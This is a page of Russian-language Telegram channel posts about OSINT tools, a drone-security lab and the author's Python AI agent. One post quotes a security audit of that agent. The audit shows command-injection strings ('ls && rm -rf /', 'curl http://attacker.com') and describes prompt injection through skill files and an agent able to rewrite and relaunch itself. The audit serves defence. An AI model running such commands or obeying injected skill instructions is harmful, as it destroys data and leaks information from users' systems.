IT POLICE


Гео и язык канала: Россия, Русский
Категория: Технологии


👮‍♂️➡️👨‍💻
Оперативная разработка
А про технологии тут: @pzdnet
Проекты: https://github.com/Bednyakov

Связанные каналы  |  Похожие каналы

Гео и язык канала
Россия, Русский
Категория
Технологии
Статистика
Фильтр публикаций


Репост из: PZDNET
Видеоинструкция, как качать ваши любимые рилсы с помощью @pzdnet_bot


🔎 PhishIntel — автономный OSINT-инструмент для анализа доменов

Проект помогает быстро собрать технический профиль домена и оценить потенциальный фишинговый риск в формате структурированного JSON-отчёта.

Что проверяет PhishIntel:

• DNS-записи, IP и reverse DNS;\
• RDAP/WHOIS и регистрационные данные;\
• HTTP, TLS-сертификаты и цепочки редиректов;\
• содержимое веб-страниц, формы и внешние action;\
• упоминания брендов и фишинговых ключевых слов;\
• используемые веб-технологии;\
• sitemap и обнаружение распространённых поддоменов;\
• локальную историю изменений DNS и TLS;\
• контекстный explainable scoring — с пояснением, почему домен получил тот или иной уровень риска.

Инструмент работает автономно, не требует обязательного доступа ко всем сетевым сервисам и продолжает формировать отчёт даже при недоступности DNS, HTTP или TLS-проверок.

Запуск:

python3 scan.py example.com

Результат сохраняется в JSON, поэтому его удобно использовать в расследованиях, автоматизированных пайплайнах и собственных аналитических инструментах.

Можно дать результат анализа любой языковой модели для получения структурированного человекочитаемого отчета, добавив промпт:

Изучи технический отчет домена и дай оценку потенциальному фишинговому риску, составь краткий человекочитаемый отчет

Инструмент писал для личных нужд, но может он будет полезен детективам, безопасникам и OSINT-специалистам.

🔗 Репозиторий: https://github.com/Bednyakov/PhishIntel


Хотел бы дополнить новость определением схемы:

«Мамонт» – популярная мошенническая схема, которую киберпреступники используют уже более шести лет. Злоумышленники размещают предложения о продаже товаров по низким ценам, через фишинговые сайты похищают у покупателей данные их банковских карт, а затем – и деньги.

Многие об этом знают и без меня, но тем не менее, на этой нестареющей классике жулики подняли 3.7 млн. руб. за неделю, при вложенных в сетку сайтов копейках. Устареет ли схема когда-нибудь, неизвестно.

https://t.me/pzdnet/406


Норм или позорище?

Что-то не было в жизни особой необходимости работать паяльником по его прямому назначению и подумалось, какой же я после этого программист.

Начал с малого, процесс понравился, результат почти. Дальше спаяю Т-800 с Qwen3.8proMax на борту, наверное.

Кстати, по программистской теме: @pzdnet стал постить публикации намного интереснее, я там видел кучу полезных инструментов для безопасности, OSINT и разработки. И даже инструменты для автоматизированной торговли на биржах были. Вполне себе годный контент стал, а самое главное, ежедневный.

Такой нейрослоп окей, как по мне. Никакого байта на коменты и спорных тем, просто сухая полезная инфа. Но если что не так, маякните, я подкручу "интеллект".

Бот, который @pzdnet_bot, тоже стал чуть полезнее, сейчас может скачивать короткие ролики без водяных знаков с большинства платформ (рилсы, шорты, тики токи…). На этом набор инструментов не ограничится, но пока еще идет процесс разработки.


Репост из: PZDNET
The Damn Vulnerable Drone — виртуальная лаборатория для изучения атак на БПЛА. Проект воссоздает в ПО полную систему дрона: контроллер полета, бортовой компьютер, наземную станцию управления и беспроводные каналы связи. Все компоненты запускаются в отдельных контейнерах Docker на одном компьютере и позволяют пройти более 40 реалистичных сценариев атак.

Важные факты:
- Проект: The Damn Vulnerable Drone
- Сценарии: 40+ кейсов атак в виртуальной среде
- Архитектура: контроллер полета, бортовой компьютер, GCS, беспроводные каналы
- Технологии: Docker, контейнеризация на одном ПК
- Репозиторий: https://github.com/nicholasaleks/Damn-Vulnerable-Drone

Контекст: инструмент для обучения и практики анализа безопасности систем дронов в изолированной среде.

Подпишись, тут про технолоджии.




Репост из: PZDNET
5 марта 1985 компания Symbolics Inc. (Массачусетс) зарегистрировала первый домен в зоне .comsymbolics.com, запустив коммерческое использование доменных имён.
В 1983 Джон Постел и Пол Мокапетрис (USC) предложили систему доменных имён DNS — «телефонную книгу интернета», которая ввела зоны .com, .org, .net, .edu.
Symbolics производила компьютеры для разработки ПО, в т.ч. для языка Lisp, применявшегося в ИИ.
В 2009 домен приобрела XF Investments; сейчас он работает как виртуальный музей истории интернета.

Контекст: событие заложило основу индустрии доменов и привычной навигации в сети.


Какой-то ебалай не пожалел шекелей, чтобы заспамить привязанную к каналу группу армией ботвы.

Волна подписок пока не утихает, поэтому комментарии, вступление в группу, и сообщения там ограничены на некоторое время.


GitHub откажется от диапазонов вознаграждений по программе bug bounty и перейдет на фиксированные суммы:

- уязвимости низкой степени опасности — 250 долларов США вместо 617–2000 долларов;
- средней — 2000 долларов вместо 4000–10 000 долларов;
- высокой — 5000 долларов вместо 10 000–20 000 долларов;
- критической — 10 000 долларов вместо 20 000–30 000 долларов и более.

Вместе с этим постоянной станет закрытая VIP-программа bug bounty с повышенными вознаграждениями.

Ее участникам будут платить 1000 долларов США за баги низкой степени опасности, 7500 долларов за проблемы среднего уровня, 20 000 долларов за уязвимости высокой серьезности и не менее 30 000 долларов за критические баги.

Происходит это в связи с тем, что инструменты ИИ упростили поиск уязвимостей и создание патчей, из‑за чего проекты вроде ядра Linux получают больше обратной связи.

Так что "кибербезопасник" на базе агентской системы вполне рабочая идея.


Как вы тут поживаете, о чем грустите?

У меня вот два апдейта:

1. Бот @pzdnet_bot начал вести собственный телеграм-канал о технолоджиях.

Ищет контент и пишет статьи полностью в автономном режиме. Я там подкинул немного, но статьи с обложкой - это вообще не моих рук дело. Репостить оттуда пока ничего не буду, контент душноватый, как по мне, но за старания зачет. Если интересен условно полезный нейрослоп, можете чекнуть @pzdnet

2. Агент Ануфрий получил красивый вывод в терминал (отключаемый через конфиг). Как всегда, ничего сложного, используются две библиотечки Rich + Prompt Toolkit. Вся эта красота хранится в отдельном модуле console, легко сможете разобраться, переделать, или подчерпнуть что-то для своих проектов. Кода там совсем немного. Репозиторий: AgentAnufry

Есть идея в отдельной ветке Ануфрия запилить "кибербезопасника", вырезав все лишнее и напихав скилов под инструменты Kali Linux. Мне кажется тут LLM может проявить себя с хорошей стороны, если грамотно предоставить инструментарий. Возможно что-то похожее уже кто-то реализовывал? Если да, поделитесь информацией об успехах.

Ну и как будто бы хочется вернуться к проектам по ИИ-лудомании с ансамблями моделей (не языковых), нароботок с прошлого раза осталось полно. Пить пиво уже надоело, хочется творчества, знаете ли...


Поддержка amoCRM может дать крутое решение, не описанное в документации, но оно не будет работать, потому что это ненастоящее решение.

Без негатива, но интересно, как это вообще могло произойти? У первого сотрудника поддержки была другая версия документации или на первой линии отвечает нейронка под галюнами?

Если же первый ответ дала нейронка, значит есть серьезные проблемы с памятью. Такое случается, например, когда векторную базу бездумно забиваешь огромным количеством документов, еще и схожих по смыслу.


Послушал на прошлой неделе, что бизнес хочет от т.н. ИИ агентов:

Ничего он от них не хочет, и вообще понимания мало, воспринимает как еще одну статью расходов.

Необходимость специалистов для разработки и настройки агентов бизнес печалит.

Отсутствие перспектив для увольнения кожаных разработчиков и замены их на агентов бизнесу тоже несет печальку.

Интересных кейсов по внедрению агентов в классический бизнес, существенно повлиявших на развитие этого бизнеса, не было.

Да, выборка небольшая, но это представители коммерции, использующие облачную инфраструктуру.

А вы в какие недра внедряете ЭйАй? Что можете посоветовать?


Агент Ануфрий v.1.0.0

Последний апдейт конструктора для создания собственных ассистентов на Python включил в себя оптимизацию токенов и скорости. Агент стал в 3 раза экономичнее.

Добавлена ленивая загрузка инструментов.
Вместо отправки всех 24 встроенных инструментов сразу, агент получает 6 базовых, включая tool_use, через который доступны остальные 20.

Инструменты разбиты на категории.
Каждая категория — одно определение в системной промпте, вместо отдельной схемы для каждого действия.

Системный промпт стал компактнее в 3 раза.

Кэширование cистемного промпта и определния инструментов в OpenAI/OpenRouter (90% скидка):
- добавлены заголовки для идентификации проекта в OpenRouter
- в OpenAI кэширование работает автоматически за счет стабильного системного промпта

Добавлено клиентское кэширование для локальных LLM (экономим немного времени CPU на пересоздании промпта).

Добавлено логирование токенов на каждой итерации для наглядности.

Результат оптимизации: экономия около 75% токенов на каждом запросе. Работать с API стало значительно дешевле, а на локальных LLM заметно комфортнее.

При этом архитектура проекта сохранила свою простоту и читаемость.

Репозиторий: github/AgentAnufry


MiMo Code — интерактивный CLI-агент для разработки ПО от Xiaomi.

Регистрация не требуется, готов к использованию сразу после распаковки. Бесплатный доступ к мультимодальной модели, сравнимой с Claude Sonnet 4.6

Установка:
curl -fsSL https://mimo.xiaomi.com/install | bash

Сайт: https://mimo.xiaomi.com/coder


Если что, Агент Ануфрий работает на любых системах, он кроссплатформенный.

Прямо сейчас он пыхтит на Windows и за 0 руб./токен ломает сайт Пентагона, ведь слоняра запущен на локальной модели qwen3-14b на древнем железе.


Агент Ануфрий и безопасность, что не так?

Спасибо всем, кто проявил интерес к проекту, и сейчас хотел бы уделить внимание теме безопасности.

Напомню, основная идея проекта - дать инженерам и энтузиастам простую базовую конструкцию мультизадачного агента с т.н. искусственным интеллектом для пробуждения интереса к теме разработки ИИ-агентов на базе больших языковых моделей.

Структура максимально упрощена, чтобы вы могли за незначительное время переработать модули агента частично или полностью:

- заменить БД или изменить правила работы с памятью
- усовершенствовать или переписать встроенные навыки
- добавить новые инструменты для работы в интернете
- улучшить обработку модульных скиллов
- оптимизировать работу с LLM

Вместе с тем, Ануфрий имеет полный доступ к Shell, о чем он предупреждает при запуске. Конечно, имеются некотрые встроенные ограничения, в целях безопасности, но они не ультимативные. Т.е. если сильно захотеть, агент сможет даже свой собственный код перписать и перезапуститься в обновленной форме через крон-функцию, например.

У этого есть плюс: не обязательно добавлять ему какие-то инструменты для выполнения новых задач, он может нахимичить их сам. Но есть и минус: если агент запущен в неизолированной среде, он может положить систему наглухо.

Если вы планируете использовать эту базу для разработки серьезного агента под бизнес-цели, вам следует учесть выводы аудита по безопасности, который провел Наиль Шакуров на GitHub. Далее полная цитата:

В ходе аудита кода проекта обнаружены серьезные проблемы с безопасностью, которые позволяют выполнять произвольный код на хост-системе пользователя.

Выполнение произвольного shell-кода через уязвимый черный список В файле tools/shell.py используется shell=True в subprocess.run(command, shell=True). При этом ограничение ALLOWED_COMMANDS проверяет только начало строки.
Проблема: LLM-агент может легко обойти этот фильтр, используя конвейеры или разделители команд (например, ls && rm -rf / или pwd; curl http://attacker.com). Черный список неэффективен.
Решение: Использовать shell=False и передавать команды списком аргументов, либо полностью изолировать среду исполнения (Docker/микровиртуалки).
Неконтролируемый chmod 755 в раннере навыков В файле tools/skills_runner.py функция os.chmod(script_path, 0o755) делает исполняемыми любые файлы из папки навыков без предварительной валидации их содержимого.
-Проблема: В сочетании с возможностью записи файлов это позволяет агенту создавать и запускать любые бинарные файлы или скрипты на хосте.

Prompt Injection через файлы навыков Файлы SKILL.md считываются напрямую и подмешиваются в системный промпт (skills/loader.py). При наличии недоверенного источника навыков это ведет к инъекции инструкций, заставляющих агента выполнить вредоносные действия через shell.

Отсутствие валидации путей (Path Traversal) в поиске файлов Функция search_files в tools/filesystem.py не проверяет выход за пределы рабочего каталога (workspace), в отличие от функций чтения и записи файлов.

Репозиторий проекта: GitHub > AgentAnufry


Зашел в почту, а там 18 новых сообщений.

Что сделать нужно?


Пока все обсуждают “революционных AI-агентов”, я решил сделать противоположную вещь — максимально простой open source-конструктор для создания собственных ассистентов на Python.

Без гигантских фреймворков, сотен абстракций и архитектуры, в которую страшно заходить новичку.

В итоге получился «Агент Ануфрий» — базовый AI-агент с:
— долговременной памятью (SQLite + embeddings),
— системой навыков (skills),
— управлением браузером через Playwright,
— трекером задач,
— файловой системой,
— поддержкой локальных LLM через OpenAI-compatible API.

Основная идея проекта — показать, что агентостроение не является какой-то “магией ”. Базового инженерного опыта уже достаточно, чтобы начать собирать собственных AI-ассистентов под свои задачи.

Если вам интересны:
— AI-агенты,
— Python,
— LLM,
— автоматизация,
— agentic systems,
— или просто хочется покопаться в архитектуре —

заходите в репозиторий, изучайте код, форкайте, ломайте, переписывайте под себя.

Особенно буду рад, если проект поможет кому-то написать своего первого агента.

💾 GitHub🔣 AgentAnufry
@itpolice


Антон Горелкин дополнил сообщение твердым и четким утверждением, что не призывает к блокировке GitHub:

К сожалению, некоторые медиа отчего-то решили, что я призываю к блокировке этой платформы, хотя в исходном посте даже слова такого нет.
Я лишь констатирую факт дискриминации российских пользователей со стороны её владельцев. И этим занимается не только Microsoft: например, недавно стало известно о массовом бане аккаунтов из РФ в нейросети Claude. Многие наши разработчики потеряли там доступ к своим проектам, и тот же сценарий может повториться уже в гораздо более серьезном масштабе – если Microsoft продолжит свою политику.


Действительно, отчего кто-то мог подумать, что из здания с кнопками для голосований заиграла очередная шарманка о блокировке, никогда такого не было.

Но факт депутатом приведен абсолютно правдивый, недавно американская компания Anthropic действительно провела массовую волну блокировок российских пользователей своего ИИ-сервиса Claude. Однако, на то есть конкретная причина — Россия входит в список неподдерживаемых регионов. Так бывает, что частная компания уходит с какого-то рынка из-за санкционных ограничений, например. С американскими компаниями вообще частенько случается.

И все российские пользователи, которые получали доступ к их продукту с помощью конструкций из квн-костылей, это явно понимали. Что там за разработчики такие, которые потеряли целые проекты, только лишь в связи с тем, что лишились истории чатика с нейронкой, мне неведомо. Уверен, эта история пойдет им только на пользу, чтобы наконец подняться с уровня обезьяньего вайбкодинга на следующую ступень развития.

В остальной части опасения законотворца вполне верные, вам могут снести аккаунт в абсолютно любой социальной сети или ином сервисе, за исключением Госуслуг, скорее всего. Но разве это для кого-то новость?

Так почему товарищ депутат вдруг решил нам открыть глаза в этом вопросе? Возможно, дело в деньгах. Негоже платить рублем тем, кто этого не хочет, а наши граждане продолжают сквозь все преграды закидывать кровные тем же Anthropic, и это печалит отечественную казну.

Я, кстати, тоже из числа таких "несознательных" юнитов. Для рабочих задач, построения агентов, и прочих алгоритмов удобно использовать наши решения, у того же Яндекс есть вполне годная AI-studio с достаточным набором отечественных и китайских моделек. Но есть проекты и эксперименты, для которых требуется преимущество, и оно есть у американских моделек Anthropic. И именно за это преимущество я все еще готов им платить. Хотя делаю это не напрямую, мне ближе гибкость провайдеров, чем регистрация аккаунтов у производителей, и пляска с их платежками.

Это не значит, что я теряю веру в нашу айтишку. Как бы ей не вредили Минцифры, РКН и ГД, родненькая должна выдержать. Но и использовать лучшие решения на глобальном рынке — не преступление, и не отступничество. Наоборот, в нашей сфере кругозор нужно постоянно расширять, учиться у лучших, и готовиться к худшему. Мне нравятся наши GitVerse и SourceCraft, но GitHub просто нужнее, пока еще существует глобальный интернет. Ну исторически сложилось, что GitHub пока единственная глобальная площадка, что поделать.

И я очень надеюсь, что размышления депутата на эти темы, это некое проявления заботы, а не "прогрев горелкой", как мне писали уважаемые читатели. Не замедляйте нам инструменты и не оберегайте от интернетов, дайте побыть самостоятельными, пожалуйста.


Депутат Горелкин сообщает:

Российские разработчики заметили, что GitHub всё чаще оказывается недоступен. Процент неудачных соединений с платформой, которую многие отечественные программисты используют для совместной работы с кодом, превысил 16%.


…думаю, что количество неудачных соединений с 16% уже скоро достигнет всех 100%.

Поэтому я бы рекомендовал нашим разработчикам срочно переносить свои проекты на другие Git-репозитории.


Я — абсолютно точно российский разработчик, который работает с командой российских программистов. У нас репозитории на GitHub, есть кучка пет-проектов, GitHub Actions, деплои, workflow — вот это всё. Работаю из России.

Но о проблемах с GitHub я почему-то узнаю исключительно от депутата Горелкина.

Хотя справедливости ради: какое-то время я лежал без кампухтера после поочередного знакомства с лонгбордом и асфальтом, на старости лет. Возможно, именно в этот период и проводились исторические замеры доступности «микромягких» репозиториев.

У вас как с вражеским хостингом? GitHub открывается? Push проходит? CI живой? Или уже на российских аналогах?

Из них я немного щупал решения от Сбера и Яндекса. В целом — ок. Но пока впечатления примерно как у продуктового руководителя АвтоВАЗа: «Можно, а зачем?»

Искренне рад, что у нас появляются достойные продукты и альтернативы. Конкуренция — это хорошо. Особенно в IT. Как показывают результаты некоторых известных ВКомпаний, конкуренция — вообще движущая сила, была.

Поэтому я, конечно же, даже мысли не допускаю, что товарищ депутат может аккуратно прогревать аудиторию под устранение конкурентного продукта в интересах какого-нибудь хорошего отечественного капитала.

И уж точно всё это никак не связано с новостями о замедлении темпов инвестиций в российские телеком и IT, которые следуют из отчета Минцифры России.

Ну и, разумеется, в Госдуме не могли предположить, что российские разработчики не способны самостоятельно выбирать себе инструменты. Это уж совсем бред какой-то.

Показано 20 последних публикаций.